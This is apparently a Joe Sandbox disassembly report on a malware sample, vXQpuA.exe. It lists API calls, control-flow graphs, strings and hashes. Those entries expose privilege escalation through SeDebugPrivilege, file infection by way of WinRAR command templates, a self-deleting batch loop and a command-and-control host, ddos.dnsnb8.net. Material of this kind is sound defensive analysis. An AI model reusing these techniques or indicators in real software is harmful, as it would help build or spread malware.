                                                control_flow_graph 372 6114e1-6114fb 373 611541-611547 372->373 374 6114fd-611510 GetModuleHandleA 372->374 377 611573-611574 call 611638 373->377 378 611549-61154c 373->378 375 611512-611518 374->375 376 61151a-611535 VirtualQuery 374->376 375->373 379 611537-611539 376->379 380 61153b 376->380 385 611579-61157a ExitProcess 377->385 381 611569-611570 378->381 382 61154e-611555 378->382 379->373 379->380 380->373 382->381 384 611557-611566 call 611af9 382->384 384->381
                                                APIs
                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00611504
                                                • VirtualQuery.KERNEL32(006114E1,?,0000001C), ref: 00611525
                                                • ExitProcess.KERNEL32 ref: 0061157A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: ExitHandleModuleProcessQueryVirtual
                                                • String ID:
                                                • API String ID: 3946701194-0
                                                • Opcode ID: 45bc568c5c4ad3140564c360a3f50f2ba585b756154b6dfa8a05430d767da7da
                                                • Instruction ID: a2fd11c28bec24ae4142ac9c0612d3fd795b0936b92c25b69937af3d7d429ef1
                                                • Opcode Fuzzy Hash: 45bc568c5c4ad3140564c360a3f50f2ba585b756154b6dfa8a05430d767da7da
                                                • Instruction Fuzzy Hash: 36115EB1D01215DFCF10DFA5B8856FD77BBEB85711B18A02BF602DB250E6348981EB50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 388 611915-611922 389 611924-611926 388->389 390 611928-61192c 388->390 391 61196e-611970 389->391 392 61194f-611952 390->392 393 61192e-61194d memset GetFileTime 390->393 392->391 395 611954-611960 SetFileTime 392->395 394 611966-611968 393->394 396 61196a 394->396 397 61196c 394->397 395->394 396->397 397->391
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: FileTimememset
                                                • String ID:
                                                • API String ID: 176422537-0
                                                • Opcode ID: 323f1d4380aa0f9c77b46b170d48acb819f83beca1e49e3ab9416b907dd605e7
                                                • Instruction ID: 6573639a602018b0c992fb00b018dde77bb7bfe688e7d3fb707ba593f18ce745
                                                • Opcode Fuzzy Hash: 323f1d4380aa0f9c77b46b170d48acb819f83beca1e49e3ab9416b907dd605e7
                                                • Instruction Fuzzy Hash: BDF04432200219ABDB209E26DC04AE777EEAB55361F08893AF626D9150E730D685CBF0
                                                APIs
                                                • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\vXQpuA.exe,?,?,?,?,?,?,006113EF), ref: 006111AB
                                                • OpenProcessToken.ADVAPI32(00000000,00000028,006113EF,?,?,?,?,?,?,006113EF), ref: 006111BB
                                                • AdjustTokenPrivileges.ADVAPI32(006113EF,00000000,?,00000010,00000000,00000000), ref: 006111EB
                                                • CloseHandle.KERNEL32(006113EF), ref: 006111FA
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,006113EF), ref: 00611203
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\vXQpuA.exe, xrefs: 006111A5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                                • String ID: C:\Users\user\AppData\Local\Temp\vXQpuA.exe
                                                • API String ID: 75692138-3243034452
                                                • Opcode ID: 4e08de804a504ec6e4adaebbb4d77f36efdaad3e51f9830d01aa999529719246
                                                • Instruction ID: 6f18135594e1f7a0df20ab76b18cc6bb71d03768579fc764d29619b51f6aa1a3
                                                • Opcode Fuzzy Hash: 4e08de804a504ec6e4adaebbb4d77f36efdaad3e51f9830d01aa999529719246
                                                • Instruction Fuzzy Hash: 0101D675900219EFDB00DFD4C989AEEBBBAFB08345F14856AE606E2250D7715F849B50
                                                APIs
                                                • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\vXQpuA.exe), ref: 006113BC
                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 006113DA
                                                • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00611448
                                                  • Part of subcall function 0061119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\vXQpuA.exe,?,?,?,?,?,?,006113EF), ref: 006111AB
                                                  • Part of subcall function 0061119F: OpenProcessToken.ADVAPI32(00000000,00000028,006113EF,?,?,?,?,?,?,006113EF), ref: 006111BB
                                                  • Part of subcall function 0061119F: AdjustTokenPrivileges.ADVAPI32(006113EF,00000000,?,00000010,00000000,00000000), ref: 006111EB
                                                  • Part of subcall function 0061119F: CloseHandle.KERNEL32(006113EF), ref: 006111FA
                                                  • Part of subcall function 0061119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,006113EF), ref: 00611203
                                                Strings
                                                • SeDebugPrivilege, xrefs: 006113D3
                                                • C:\Users\user\AppData\Local\Temp\vXQpuA.exe, xrefs: 006113A8
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                                • String ID: C:\Users\user\AppData\Local\Temp\vXQpuA.exe$SeDebugPrivilege
                                                • API String ID: 4123949106-3002367669
                                                • Opcode ID: 3ea71794a4073d5d2f578111ba73d48459f3c044b78bf94c9b870b004008e6ef
                                                • Instruction ID: c966b6fd8088b1b5583bffa806a919246786e2cd91d8e1efbb9f7041a00d03b2
                                                • Opcode Fuzzy Hash: 3ea71794a4073d5d2f578111ba73d48459f3c044b78bf94c9b870b004008e6ef
                                                • Instruction Fuzzy Hash: DD31A471D00219EADF20DBA5CC45FEEBBBAEB46704F14406AE714FA241D7309E85CB60

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 401 61239d-6123d6 strstr 402 612451-61247a CreateFileA GetFileSize 401->402 403 6123d8-6123e2 401->403 405 612480-612483 402->405 406 612675-612676 CloseHandle 402->406 404 6123ed-6123f1 403->404 408 6123f3-61241d 404->408 409 6123e4-6123ec 404->409 405->406 410 612489-612493 405->410 407 61267c-612681 RemoveDirectoryA 406->407 411 612687-61268f 407->411 408->402 412 61241f-612425 408->412 409->404 410->406 413 612499-61254b call 611915 CloseHandle memset strrchr wsprintfA strrchr memset * 2 wsprintfA Sleep call 61189d 410->413 415 612427-612436 412->415 416 61243a-612443 412->416 413->407 422 612551-612556 413->422 415->412 418 612438 415->418 416->411 419 612449 416->419 418->402 419->402 422->407 423 61255c-61261c Sleep memset wsprintfA call 6129e2 memset wsprintfA Sleep call 61189d Sleep CreateFileA call 611915 CloseHandle 422->423 423->407 430 61261e-612626 423->430 430->407 431 612628-61262c 430->431 432 612634-612640 431->432 433 61262e-612632 431->433 434 612641-612665 SetFilePointer WriteFile 432->434 433->434 434->407 435 612667-612673 SetEndOfFile 434->435 435->407
                                                APIs
                                                • strstr.MSVCRT ref: 006123CC
                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00612464
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00612472
                                                • CloseHandle.KERNEL32(?,00000000,00000000), ref: 006124A8
                                                • memset.MSVCRT ref: 006124B9
                                                • strrchr.MSVCRT ref: 006124C9
                                                • wsprintfA.USER32 ref: 006124DE
                                                • strrchr.MSVCRT ref: 006124ED
                                                • memset.MSVCRT ref: 006124F2
                                                • memset.MSVCRT ref: 00612505
                                                • wsprintfA.USER32 ref: 00612524
                                                • Sleep.KERNEL32(000007D0), ref: 00612535
                                                • Sleep.KERNEL32(000007D0), ref: 0061255D
                                                • memset.MSVCRT ref: 0061256E
                                                • wsprintfA.USER32 ref: 00612585
                                                • memset.MSVCRT ref: 006125A6
                                                • wsprintfA.USER32 ref: 006125CA
                                                • Sleep.KERNEL32(000007D0), ref: 006125D0
                                                • Sleep.KERNEL32(000007D0,?,?), ref: 006125E5
                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006125FC
                                                • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00612611
                                                • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00612642
                                                • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 0061265B
                                                • SetEndOfFile.KERNEL32 ref: 0061266D
                                                • CloseHandle.KERNEL32(00000000), ref: 00612676
                                                • RemoveDirectoryA.KERNEL32(?), ref: 00612681
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                                • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2203340711-2750826870
                                                • Opcode ID: e5833b98aa60d7829c58d26d02b4704d7dffe51190f0019bc68034e01adacbcd
                                                • Instruction ID: d29305a30d1c4d73ae4f2543459749953b0431b80296214518ce14a78aefcb7c
                                                • Opcode Fuzzy Hash: e5833b98aa60d7829c58d26d02b4704d7dffe51190f0019bc68034e01adacbcd
                                                • Instruction Fuzzy Hash: 5981EFB1504305ABD710DF60DC48EEBBBEEFB88705F08491AF645D2290D7709A898BA6
                                                Control-flow Graph (image not reproduced)
                                                APIs
                                                • memset.MSVCRT ref: 00612766
                                                • memset.MSVCRT ref: 00612774
                                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00612787
                                                • wsprintfA.USER32 ref: 006127AB
                                                  • Part of subcall function 0061185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75A78400,http://%s:%d/%s/%s,?,?,?,00611118), ref: 00611867
                                                  • Part of subcall function 0061185B: srand.MSVCRT ref: 00611878
                                                  • Part of subcall function 0061185B: rand.MSVCRT ref: 00611880
                                                  • Part of subcall function 0061185B: srand.MSVCRT ref: 00611890
                                                  • Part of subcall function 0061185B: rand.MSVCRT ref: 00611894
                                                • wsprintfA.USER32 ref: 006127C6
                                                • CopyFileA.KERNEL32(?,00614C80,00000000), ref: 006127D4
                                                • wsprintfA.USER32 ref: 006127F4
                                                  • Part of subcall function 00611973: PathFileExistsA.KERNELBASE(\Na`Na,00000000,C:\Users\user\AppData\Local\Temp\vXQpuA.exe), ref: 00611992
                                                  • Part of subcall function 00611973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006119BA
                                                  • Part of subcall function 00611973: Sleep.KERNEL32(00000064), ref: 006119C6
                                                  • Part of subcall function 00611973: wsprintfA.USER32 ref: 006119EC
                                                  • Part of subcall function 00611973: CopyFileA.KERNEL32(?,?,00000000), ref: 00611A00
                                                  • Part of subcall function 00611973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00611A1E
                                                  • Part of subcall function 00611973: GetFileSize.KERNEL32(?,00000000), ref: 00611A2C
                                                  • Part of subcall function 00611973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00611A46
                                                  • Part of subcall function 00611973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00611A65
                                                • DeleteFileA.KERNEL32(?,?,00614E54,00614E58), ref: 0061281A
                                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00614E54,00614E58), ref: 00612832
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                                • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                                • API String ID: 692489704-613076915
                                                • Opcode ID: 15e9dd4a0b9731c3da93ed45c0e02bc8acf8e0dc5e159c636082fd85638452fd
                                                • Instruction ID: 99ddcd6f3c82f4a4693d06aa8e122afffab516f0324024e02aaa2eb2293fad81
                                                • Opcode Fuzzy Hash: 15e9dd4a0b9731c3da93ed45c0e02bc8acf8e0dc5e159c636082fd85638452fd
                                                • Instruction Fuzzy Hash: 1521A7F694022C7BDB10EBA49C89FDB77AEDB04745F0944A2B605E3141E670DFC48AA0
                                                APIs
                                                  • Part of subcall function 0061185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75A78400,http://%s:%d/%s/%s,?,?,?,00611118), ref: 00611867
                                                  • Part of subcall function 0061185B: srand.MSVCRT ref: 00611878
                                                  • Part of subcall function 0061185B: rand.MSVCRT ref: 00611880
                                                  • Part of subcall function 0061185B: srand.MSVCRT ref: 00611890
                                                  • Part of subcall function 0061185B: rand.MSVCRT ref: 00611894
                                                • wsprintfA.USER32 ref: 006115AA
                                                • wsprintfA.USER32 ref: 006115C6
                                                • lstrlen.KERNEL32(?), ref: 006115D2
                                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 006115EE
                                                • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00611609
                                                • CloseHandle.KERNEL32(00000000), ref: 00611612
                                                • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0061162D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                                • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\vXQpuA.exe$open
                                                • API String ID: 617340118-1385103046
                                                • Opcode ID: 599c55488f01ca2a130f29a4e2ee38253271e9c739d5482064136c43223fe9b5
                                                • Instruction ID: 682dd6be1649bc4cf1145427bd67510adcabb956e54ac084ab20c58eadce3696
                                                • Opcode Fuzzy Hash: 599c55488f01ca2a130f29a4e2ee38253271e9c739d5482064136c43223fe9b5
                                                • Instruction Fuzzy Hash: 77119476A011387ED720D7A49C89DEB7BBDDF19311F080052F94AE2240DA709BC48BB0
                                                APIs
                                                • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00611400), ref: 00611226
                                                • GetProcAddress.KERNEL32(00000000), ref: 0061122D
                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00611400), ref: 0061123F
                                                • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00611400), ref: 00611250
                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\vXQpuA.exe,?,?,?,?,00611400), ref: 0061129E
                                                • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\vXQpuA.exe,?,?,?,?,00611400), ref: 006112B0
                                                • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\vXQpuA.exe,?,?,?,?,00611400), ref: 006112F5
                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00611400), ref: 0061130A
                                                Strings
                                                • ntdll.dll, xrefs: 00611219
                                                • ZwQuerySystemInformation, xrefs: 00611212
                                                • C:\Users\user\AppData\Local\Temp\vXQpuA.exe, xrefs: 00611262
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                                • String ID: C:\Users\user\AppData\Local\Temp\vXQpuA.exe$ZwQuerySystemInformation$ntdll.dll
                                                • API String ID: 1500695312-3879772653
                                                • Opcode ID: ab977b0bf03033fcf6d4b8769805b82876ed538d935d0c29cc7465caab51d712
                                                • Instruction ID: 985721c64ea5cc395d24c478363774f2c887ad37c5db5a3bdf41059701d51842
                                                • Opcode Fuzzy Hash: ab977b0bf03033fcf6d4b8769805b82876ed538d935d0c29cc7465caab51d712
                                                • Instruction Fuzzy Hash: 3F21D771605361ABD7209B65CC04BEBBAAAFB4AB01F184919F646DA340C770DBC4C7A5
                                                APIs
                                                • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HGa,http://%s:%d/%s/%s,006110E8,?), ref: 00611018
                                                • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75A78400), ref: 00611029
                                                • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00611038
                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0061104B
                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00611075
                                                • CloseHandle.KERNEL32(?), ref: 0061108B
                                                • CloseHandle.KERNEL32(00000000), ref: 0061108E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                                • String ID: HGa$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                • API String ID: 1223616889-3642003181
                                                • Opcode ID: 12b195d546a3f3772b7636684453fd69e175231f8f602ea36ecce1c467889698
                                                • Instruction ID: f2d3be2e2a63dfecc4ec3e3c9782bfd0088d76e2a1ea5dc42383253195b4c8fd
                                                • Opcode Fuzzy Hash: 12b195d546a3f3772b7636684453fd69e175231f8f602ea36ecce1c467889698
                                                • Instruction Fuzzy Hash: 98019B7150035CBFE7305F609C88EAB7BEEDB4879AF09452AF345A6290DA705E848B70
                                                APIs
                                                • memset.MSVCRT ref: 006118B1
                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,75920F00,75A78400), ref: 006118D3
                                                • CloseHandle.KERNEL32(I%a), ref: 006118E9
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 006118F0
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00611901
                                                • CloseHandle.KERNEL32(?), ref: 0061190A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                                • String ID: I%a
                                                • API String ID: 876959470-1380773492
                                                • Opcode ID: 8a20773ffe8ef1e38377cc4d2965ed3136cfa0f98957d7a39b01080fbd3c7590
                                                • Instruction ID: cde36df8c25317c441865b7b1ab77e7c391a828d342c310b196f82e5228e60da
                                                • Opcode Fuzzy Hash: 8a20773ffe8ef1e38377cc4d2965ed3136cfa0f98957d7a39b01080fbd3c7590
                                                • Instruction Fuzzy Hash: 3A017176901128BBCB216B95DC48DDF7F7EEF85761F148022FA16A52A0D6314A58CBA0
                                                APIs
                                                • GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75A78400,http://%s:%d/%s/%s,?,?,?,00611118), ref: 00611867
                                                • srand.MSVCRT ref: 00611878
                                                • rand.MSVCRT ref: 00611880
                                                • srand.MSVCRT ref: 00611890
                                                • rand.MSVCRT ref: 00611894
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: Timerandsrand$FileSystem
                                                • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                • API String ID: 4106363736-3273462101
                                                • Opcode ID: 5b2a3ba0cc0e8a45e92f6f89c7fdc23e68e34c608cc2efe2e1651b208a42e24a
                                                • Instruction ID: c1b5b4cf5bb4b794c46a5da15c6d932d7a54522c4de6e93580757275ac153ae0
                                                • Opcode Fuzzy Hash: 5b2a3ba0cc0e8a45e92f6f89c7fdc23e68e34c608cc2efe2e1651b208a42e24a
                                                • Instruction Fuzzy Hash: 55E0D877A00228BBDB00A7F9EC468DEBBECDE88162B140567F601D3350E570FD448AB8
                                                APIs
                                                • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7591E800,?,?,006129DB,?,00000001), ref: 006126A7
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,7591E800,?,?,006129DB,?,00000001), ref: 006126B5
                                                • lstrlen.KERNEL32(?), ref: 006126C4
                                                • ??2@YAPAXI@Z.MSVCRT ref: 006126CE
                                                • lstrcpy.KERNEL32(00000004,?), ref: 006126E3
                                                • lstrcpy.KERNEL32(?,00000004), ref: 0061271F
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0061272D
                                                • SetEvent.KERNEL32 ref: 0061273C
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                                • String ID:
                                                • API String ID: 41106472-0
                                                • Opcode ID: 033bb5bc089729a6c342191777390dd8429d2f4298f9d39c64f25a78ad29ca7e
                                                • Instruction ID: e3b1c58b3940e7abda374c4e77bbbd2e0fdc09e083f16dbacfa785d18bee4ec2
                                                • Opcode Fuzzy Hash: 033bb5bc089729a6c342191777390dd8429d2f4298f9d39c64f25a78ad29ca7e
                                                • Instruction Fuzzy Hash: AA117C35900111AFCB219F15EC588DA7BABFF8476171C902BF455C7260DB308995DB90
                                                APIs
                                                Strings
                                                • IBfgxFcHEYIoKBemTULDvZPZVmbgVzBsJQEXterXqmunObcRNonOXRudjiDoJsDUtnUdNCjKKHJlhfQAlMANfHrGwPTYjxyaklkhEOMqFAPvLdrIVcpzYQSwqkpeTCbwSaGtiphuzWvGsMWCRiyaLWxZSyFg, xrefs: 00611B8A, 00611B9C, 00611C15, 00611C49
                                                • .exe, xrefs: 00611C57
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: lstrcatmemcpymemsetrandsrand
                                                • String ID: .exe$IBfgxFcHEYIoKBemTULDvZPZVmbgVzBsJQEXterXqmunObcRNonOXRudjiDoJsDUtnUdNCjKKHJlhfQAlMANfHrGwPTYjxyaklkhEOMqFAPvLdrIVcpzYQSwqkpeTCbwSaGtiphuzWvGsMWCRiyaLWxZSyFg
                                                • API String ID: 122620767-317181783
